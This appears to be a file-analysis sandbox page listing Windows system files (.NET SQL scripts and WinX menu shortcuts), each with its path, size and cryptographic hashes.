                                                                                                                                                                                                                                                                                                                                          1c894de461e821f6c6ce4508808c460d605ecb1221b2c5e8c70bf71fd27a62607c74c8f8456493555fb4073f19aadaf9941107b976603016da8d36617565a996

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UninstallSqlState.sql
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          9KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          87be109c4977fe31cbc12c238e2da925

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          45b3be91294cce22e1398528305c827453dba49b

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          0a259dced38a274ea3fcd0b0f9059506ae6f9a8d5b7fe820e233e3919879c069

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          1bb5b2e1cf3872c7e10a73ad077a2a2fac886221050346e7473b2cde0a3c4e0bd160b82323cfbcfb01d080462fa7488e1d182c088318ccadd76ac9c0d6477dd4

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UninstallSqlStateTemplate.sql
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          11KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          4447bea89f3dde0f807f376d4a086240

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          fa3858a68fcd622f86740f623da7a74dc087c5bd

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          e5b4b8d5e0f3922cdc51fe9563af0576b7f3cf2b498a5138b4edc9085770c1d1

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          46054d8ad9522387337f784531ed73ebf4b8bfa8b210019d647592e61163d4ea13311c97076221bf276ca3171df0e780161f1dc9cbb36253d3ae23e273aaa9c9

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UninstallWebEventSqlProvider.sql
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          f5f6c044af7eed4b801c5a7d6dee3f47

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          5db7104c27804903b244e36b19044cc661d27d8b

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          394b34307c663bb9606fefa89a6b6bb8d381e3fe05539d95bdb508d47df57a9e

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          cb9e94addd6d69eb1872c903d7170ae8b50e0acd3f2de4b56c21be9e210b13727b7ed31a8426a29041642cc88bee9f23edc679942ead41f5d837d86a70e9a46d

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SQL\en\SqlPersistenceService_Logic.sql
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          23KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          65d981a6136001fa85c75adca46fbbe9

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          c017834517dc606179d1811ac55625e61bbc4eb7

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          c29313fc757ad2bd22873f3127027ebe73ae38e88d4584edf09f18b3851604d4

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          4ae8918f84cdc7174df354816ea66e23922d71f38512a0a2cc9b1ad3c1ab1a73754091b89fd35c0e9f0df5b9e45c5eddcccbb87b914e7210947aeedb30c7082a

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SQL\en\SqlPersistenceService_Schema.sql
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          8fde9f513fddc9586afaedcb589319fa

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          cefdb4ebbf1059d883c98e5c4dc0690c4ce259a2

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          507cbc185b72ddd04c4155e30e23356c2c970eba32c0dc86186343b1077b5cfe

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          dba628470c9959aa4718b12b93b1cc233aabb8f84aaf3602d3e617ef02e2ec4d676ffc7472144d9ab79369706980201bc6b50e56f86fefc286a1535d16e448b3

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SQL\en\Tracking_Logic.sql
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          372KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          a225573141479ba9f416d9f67782abbb

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          6176e5593b26c4f9730a72e99f84a450d69054b8

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          304904e1c8c9032f572a990d34038c74d289367115658233f974ae46f3a50b6d

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          d00e9cc6380351454333e2c36557f58ce8108322227b277e22824a2698b3afe6a8094892600189c8101b2f5b380f61036239764ee86e795756e01d7ddce63cdb

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SQL\en\Tracking_Schema.sql
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          49KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          2235468d62c673b49f0be1155f12b20c

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          3fcc429956ce39f816142f16a319799fe30dfb52

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          a551d969f9bac003c0f8a049e8a3869b1fde8676f669168f1669e01ae704f038

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          9545f232a7f6514a13192f02a7138d8f954ced9d5737adb2533f0ac1522ab93180b29413e2650aa128df9887d84e41e00c8515ad8a3d2062ab0026d0826f66c1

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v3.5\SQL\fr\DropSqlPersistenceProviderLogic.sql
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          0e9329c429fc3ca51fb4068a532baaac

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          6a6ed74120507225aedd75aab7adda516cfb9d06

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          ac3533c3e4c6422264f9407069d5709c6e2d615c7afeb87fb3ed715d56e128bf

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          22d5905214adc5b095ad61556b065c70f3a4a889f5fd037e9c0e1cf09993b0012d22847c3c72f7495f8b04070f6e66329aa247774be400b1e175c615fa813ca7

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v3.5\SQL\fr\SqlPersistenceProviderLogic.sql
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          13KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          f84fd2dfb049b733b6a081b659504061

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          92402441f5d838a89f6bd0789bbd85fa3b659cab

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          bfad55970af97666c5305e08c151be4a997fdb0eb0ecd8233fe5da8b7ac40d93

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          2c102a02a6cac1fca4591c46e8309b885654c11d94699813df990ab1c72460b162466006fb85de6b55d3de39bebdcbb4662b54590b215311ade1d4b3959bf9b1

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Images\security_watermark.jpg
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          49B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          d0d899e583d53f872d8939637533a136

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          551e74f3bbe605b71714823f40c3d9dfa8e8a256

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          a8754ed51f9c4d540391c09f943ac2c24631b03d106fe36225d17f23b2acd6a6

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          0622fb21b191431553520b88ab841f1727fc95541a8791225d26b80324b46cff88ef4a9f4eee680f4414e4ad5160cc51bc46f2f6d69a1071b2a8c413657994ea

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          5c1b8d6e1acb8973b228167ee095f837

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          c9f726b735cb0ee7a6ae9c7b19800d94b9fa7144

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          9e4e3ed73f2a068f0f2e083428f830784c43a4e3ea108bd97f3bdc273fc9b0cf

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          78686091deed78ee78bbdd81012da2fa1670b66853e4ebb0a4a8a90dae91e41ed497fceafa813c96022e3772cf762a9dd83d537106984e72dcaaff4675073138

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          c7f875911145c2d7c00ea3e9f10135cc

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          884d21a83f67f49e019d5b73bc4c2c28e9aac680

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          5e5802d918d05b9289297b47962f5fdf15ea36942d40ac2de75b3b38fce30c3c

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          ecba4eba20925d6fe1e6818cb0252089674c4fe6b34ccb665bc8ff39506b0c8db6a85e18183ecd27d4a7707e4d43a548d4871a9a1e50dc4c42e95c563aaf4d1c

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          3089ddc65f652e0ea8a46082e02833db

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          79307ab37da240fb6d3ded781248f6bbf3670d09

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          aad4511d75afc9bf9e64495a2122ad47be1fd290fff6cbc98f7d115e3e48fade

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          1266db21a85fd9c4965dfd62972bc4fe6a30d51cc6879b14aab82cf26b6aaeeb539eb28f5695899afd01f57f0a483c897841623255787aff9e7f45f9c247c729

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          93ee074790e7f650014b2d3dbacf985b

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          7b4cd4ca5bddb1ee18c318d32c75b0e8b96a0499

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          47009b6a3e1a50d482f015f8c0e4320351a62fe2336aa038de509894e8ebcafb

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          fbfbc18d734666fc1781478b3b252b041c85fa395b6205f96e48c9dce61bbe1ae701fead655634a367432956b22b9d65fcecae869a3a37b79e107c80d92f93b4

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          de60ffb787e3fd6ac0f5bd5470346179

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          11933359bcded3c199117119c7350d0305743c6e

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          93da9d17843a11a733bd59655161d007e777472b262316fb0280d3b114c9666d

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          6f04319369f1694faaaf0a05d1f958f7df03dfc5137ff0cb28457d43282ce6a1f4b38de079526f086f9e6b161148efa006cdf72df24a8b3502a0291ebfd245e0

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1021B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          7052ad1bfd73b93eaacdba0c108a3936

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          f50c970dff24d49e4311a2ac2496c4d3f3bcdd1a

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          5fbe153a61c879b94e96e0bdda60bf6eae3563fe4e2147e695928f67d57792c1

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          78f5e977224cccb66f8944d0c2421878f925585e9d4e70cce8ea8bb06e20bf0dc968db8d70d899ffcfa782904c098c38248cf11a7b201a4378702017f3d9fc4f

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1015B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          dc683b67b5594829d87579177b638c21

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          e59d934f926d6f1c62997ae119771ea454fd78f4

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          0904fea160c68e8bc713f24e4b03149c01fd0f2e910361920bb840403483d477

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          3c6e34e0e1a81a298b00f9097358ae7428e70da025301e4f1e91c234b49cb618d1de2e44d48f0d59d635121a56a2d19850e6376bae901f9977274ceb8096727a

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          4605fa8e5c505d4736faca6708ec2a85

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          d377121a65d486fc62177f9103b37e5b265a9f66

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          9eb797d7a32e40da8260b2cf1723b2aece5e04429cf3874560af613b608d3ae3

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          a3139916d9df90e5cbc89c98c669a59ee88444bf7a5cc2360eba7c8ea8b1e7662afe70bb3a2fed28ee218d8c2e70c26afd7cb926f4bce1e9f8a1dfc988fddd5c

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          e2fdc410d1b89f225f100afcfd5c3119

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          4a4f0f8d487253e2b48036508d8589829f9daaee

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          ccb5ee816e27b55d25dabde2224d2e71c046bbea56c9698c5eb28a06733eda9e

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          a18671390783ce9e2a173734a77e1837e706ba181e34d053cee3c51d45edcd120ec1b2b13e7a34f52452bb676d620073692d8745835cb5700d529636414ca301

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          5c4b6ee0c703f6827648f26e432d1ba6

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          c292d70287fc054675d9a0520ab61e7bc020b3c8

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          132ed006d549dd9cc96fa7a29733e876614a2bc2c91cca19d945b96c4c6901a3

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          e99b503e6e169b26fb35e3c1d803d7c17272e60ae7f00c3f2e574e826597e1c6d93600601528884b1113fbc5f2c56330aa880c4ad6d730e2e5aeef50ee18f9a9

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1015B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          b2b4c7f458c14f13d2d5469ea8325850

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          6aadafce63701452b1ee5c3957c4607793a23b06

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          d6212ec1e0b7b49de3215a46a72646ee51c3a66b14b46142d5ab3210cceb454b

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          50c3efc96b674a073d38d9bfa4e69ec5b9ff038b328b38449fd8baa6e93030d0ea16150411a9eced32a48cc79799a4058556103bef36f7af693318c18514f4ad

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1015B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          763d0421ebe3be2d49798eb545e0c1ea

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          3c3f65dfbf46e20d552ff5d337abfe9db6bcf06f

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          326cc2009ee1122c9d8e335d3db13a0f4492fb5a71922d41a6fde51363010bc1

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          e3ebe0df38250601200b67e123d32eed5ef9e2662a891738a87b8f8b15939012a8fb96da5154c28903ea5566cc679c79eaf50c5d3d962477365efe914cc0fa13

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - NetworkStatus.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          8d2a75349ba3b24234bc0fd25b51f4cf

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          e4f6d51fad8299f3c8877e381c675d989e226455

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          42ef07c0ccb8f429234fd466bd2bcb11e7448ddddd21378c5aad79bb7865e2c9

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          32cccf69e1d5d63cb5ebf9fa214f048d6b6576056c8ce767e2c49ab68892ad4112831820216541a5ebc24d7898d3d59ea26421b99aee0ab96879c939d6a0dc73

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          2b54f8d3dd69c223516287ffb6716359

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          22230974134cb67faae2218cdc9d855bcb7d7fd8

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          b5c90a744d0e142fde6d43668de383a27cf868d3a9821cade2cc83b25348399b

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          0db6f169c4dbaaab78b3814833eeae31d763a04aa7bfe0cc2a623ebce3090565858a4ab956f68bb2f9bb24027e0541d33ac37e4fa93d134b2f5247a93776c57d

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\06 - SystemAbout.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          a969bf5be18756d580b115eb50685996

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          a286acb5c013ec18f9d85fdace5a7a9039ef4ae4

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          fed7b49dce8c5db1fd17e384d57c65c6bc91116ef03d8346d65543d46f5782e2

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          cbda2c74d95f43da1d5e5bea606970a353aef8b950c3d2c943cabbff08a990995f87c702789a9891a64918756b6115c8566ddafedafd198441298548e0b564fe

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1015B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          9d1494cc19b8f4a96159e261de867687

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          2e05c019fe5d43999f159ae1672cfc3412eab606

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          ebf28c49485b7b7b62848b97a7ee68adedff355b5f933b9b058ae387ef148aea

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          e95bc7ab920b834bbe71e884bce1676890abd9837bf1468c503eb0268554ed2065a5dad35dc87c96029500125e1aef9eec7a83e7ca9cf9f84afaec4001090576

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\08 - PowerAndSleep.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          3ccf2daadbf6a1570129c018dba04f98

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          db06be57df9a8b43e1fe723c8cc6a3baa2472042

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          116ea3748180e55fb32ba9f00c3db5f0b594ecc3c608c8ae6583aa4dd1d7c8d2

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          2d77fbc9250945e3d88297eeef0234d43553ecc2a8afe483c32ac7d3d5ef2d4c85624f96074f26e9ed646f9673cb01d02d4fe605aab31409efddb21283b5d282

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1015B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          21ff8d36d404ed99b85715a07ff0e97c

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          6e9347c85bcdb117fba3830e6b31f1a7eee46c91

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          c601203ddcb05292312ed00b54a87af974669d0eeacf09e488ab113731a1b6e1

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          e53e3a3d6828d40da15cc20d6375388210bf7a0da282f292c726a1c8c80ebf1ddd696ec51270a819736b50204dc9a6f8bb0eb054cfd64ee51a5c0842e35ccc7b

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\10 - AppsAndFeatures.lnk
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          eb4be6313bd6261a2ae64dc10efcf94c

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          96a2503197cba5a79362259c96443422ca6fa9a7

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          65df3fdef837b2651ea6ac54317b97b6cebff6a63f7ee78693c6eb33775f4993

